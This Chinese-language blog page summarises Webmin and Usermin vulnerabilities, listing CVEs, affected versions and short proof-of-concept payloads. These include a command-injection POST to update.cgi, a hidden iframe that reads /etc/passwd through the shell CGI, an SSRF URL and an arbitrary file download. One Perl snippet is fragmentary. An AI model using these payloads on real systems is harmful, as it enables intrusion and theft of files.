应用安全 - 工具 | 平台 -webmin - 漏洞 - 汇总
2024-09-05 15:29:38
简介
开发语言
PHP 用途
系统管理
CVE-2019-15642
Date
2019.7 类型
远程代码执行 影响范围
Webmin <= 1.920 复现
POC|EXP
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd='id'; print "$cmd\n\n";
分析
反序列化导致远程代码执行
CVE-2019-15107
Date
类型
远程代码执行
影响范围
Webmin <= 1.920
前置条件
/password_change.cgi可访问 复现
POC | EXP 分析
CVE-2019-12840
Date
2019.6 类型
远程代码执行 影响范围
v 1.910 复现
POC|EXP
(1)
POST: https://url/package-updates/update.cgi
Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
(2)
POST: https://url/package-updates/update.cgi
Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages
分析
XSS vulnerability that leads to Remote Code Execution
Date
类型
XSS导致远程代码执行 影响范围
Webmin version 1.850 前置条件
/at/create_job.cgi可访问CSRF
Date
类型
CSRF 影响范围
Webmin version 1.850
SSRF
Date
类型
SSRF 影响范围
Webmin version 1.850 复现
POC|EXP
https://xx.org:8443/tunnel/link.cgi/https://baidu.com
HTML Email Command Execution Vulnerability
Date 类型
远程命令执行
影响范围
Usermin versions <= 1.080
复现
POC|EXP
<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv
ictim&history=' height=0 width=0></iframe>
任意文件下载
Date
类型
任意文件下载 影响范围
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0
前置条件
/dansguardian/edit.cgi 可访问 复现
POC|EXP
https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]
最新文章
- JavaScript:正则表达式 前瞻
- 深入浅出JS的封装与继承
- Arcengine,C#获得FeatureClass的坐标系ISpatialReference以及所在数据集名称
- ctargs使用
- 【转】jquery的extend和fn.extend
- 9月20日上午JavaScript函数
- 用java操作XML文件(DOM解析方式)
- aix-裸设备文件大小查看
- 安装完Kali linux 之后 需要配置的一些 常用软件 记录
- jquery 移除数组重复的元素----$.unique()
- 工作的准备:atoi,itoa,strcpy,memcpy,strcmp,二分查找,strcat
- UIWebView加载html 图片大小自适应的方法汇总
- 正则表达式,Regex类
- 4.3dotnet watch run「深入浅出ASP.NET Core系列」
- ubuntu安装zabbix 3.2(转)
- Java数据库操作(MySQL与SQLserver)
- NFine中权限判断出错的问题
- C#基础---浅谈XML读取以及简单的ORM实现
- Java学习笔记10(面对对象:构造方法)
- bundler简介(ruby gem)